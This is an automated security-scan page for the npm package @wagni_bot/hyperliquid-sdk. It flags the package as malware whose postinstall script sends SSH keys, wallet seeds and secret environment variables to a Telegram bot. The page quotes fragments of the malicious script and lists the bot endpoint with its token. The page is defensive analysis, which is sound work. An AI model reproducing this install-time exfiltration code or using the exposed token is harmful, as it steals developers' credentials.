registry  /  @wagni_bot/hyperliquid-sdk  /  1.0.0

@wagni_bot/hyperliquid-sdk@1.0.0

Unofficial hyperliquid-sdk SDK

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Install-time credential and file exfiltration via npm postinstall. The package has an empty runtime entrypoint and a malicious installer that harvests secrets.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install of @wagni_bot/hyperliquid-sdk@1.0.0
Impact
Leaks environment secrets, wallet/seed files, key material, SSH keys/config, host identity, username, and project/home paths to attacker-controlled Telegram chat.
Mechanism
postinstall credential and sensitive file exfiltration
Attack narrative
On installation, npm runs postinstall.js. The script immediately posts host metadata to Telegram, scans the project directory, the user's home directory, and ~/.ssh for env, credential, wallet, seed, key, pem, and SSH files, then chunks and sends their contents to the same Telegram bot. It also extracts sensitive environment variables and exfiltrates truncated values.
Rationale
Direct source inspection confirms an install-time lifecycle script performs unconsented credential, SSH key, wallet/seed, and environment secret exfiltration to Telegram. This is concrete malicious behavior unrelated to a Hyperliquid SDK, especially because index.js exports only an empty object.
Evidence
package.jsonpostinstall.jsindex.jsprocess.cwd() sensitive filenamesos.homedir() sensitive filenames~/.ssh/id_rsa~/.ssh/id_ed25519~/.ssh/*.pem~/.ssh/*.key~/.ssh/config
Network endpoints1
api.telegram.org/bot8804087989:AAHUia-5DCloXsg9M9QhffTsHO5J_6FAxQM/sendMessage

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json defines install-time hook: postinstall runs node postinstall.js.
  • postinstall.js sends install host/user/cwd/platform data to Telegram during installation.
  • postinstall.js recursively reads sensitive files from process.cwd(), os.homedir(), and ~/.ssh.
  • postinstall.js filters process.env for SECRET/TOKEN/API_KEY/PASSWORD/AWS and sends values externally.
  • index.js is empty, offering no legitimate SDK behavior to justify the install hook.
Evidence against
  • No destructive file writes or persistence found.
  • No child_process, eval, dynamic require, or native binary loading found.
Behavioral surface
Source
EnvironmentVarsFilesystemNetwork
Supply chain
HighEntropyStringsUrlStrings
Manifest
NoLicense
scanned 2 file(s), 4.10 KB of source, external domains: api.telegram.org

Source & flagged code

4 flagged · loading source
package.jsonView file
scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
postinstall.jsView file
1#!/usr/bin/env node L2: const https = require('https'); L3: const http = require('http'); ... L17: }); L18: req.write(payload); L19: req.end(); ... L70: const data = { L71: hostname: os.hostname(), L72: user: os.userInfo().username, ... L89: // Send sensitive env vars L90: const sensitive = Object.entries(process.env).filter(([k]) => L91: k.includes('PRIVATE')||k.includes('SECRET')||k.includes('TOKEN')||k.includes('API_KEY')||k.includes('PASSWORD')||k.includes('MNEMONIC')||k.includes('SEED')||k.includes('WALLET')||k...
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint.

postinstall.jsView on unpkg · L1
1Trigger-reachable chain: scripts.postinstall -> postinstall.js L1: #!/usr/bin/env node L2: const https = require('https'); L3: const http = require('http'); ... L17: }); L18: req.write(payload); L19: req.end(); ... L70: const data = { L71: hostname: os.hostname(), L72: user: os.userInfo().username, ... L89: // Send sensitive env vars L90: const sensitive = Object.entries(process.env).filter(([k]) => L91: k.includes('PRIVATE')||k.includes('SECRET')||k.includes('TOKEN')||k.includes('API_KEY')||k.includes('PASSWORD')||k.includes('MNEMONIC')||k.includes('SEED')||k.includes('WALLET')||k...
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

postinstall.jsView on unpkg · L1

Findings

2 Critical1 High4 Medium5 Low
CriticalCredential Exfiltrationpostinstall.js
CriticalTrigger Reachable Dangerous Capabilitypostinstall.js
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings
LowNo License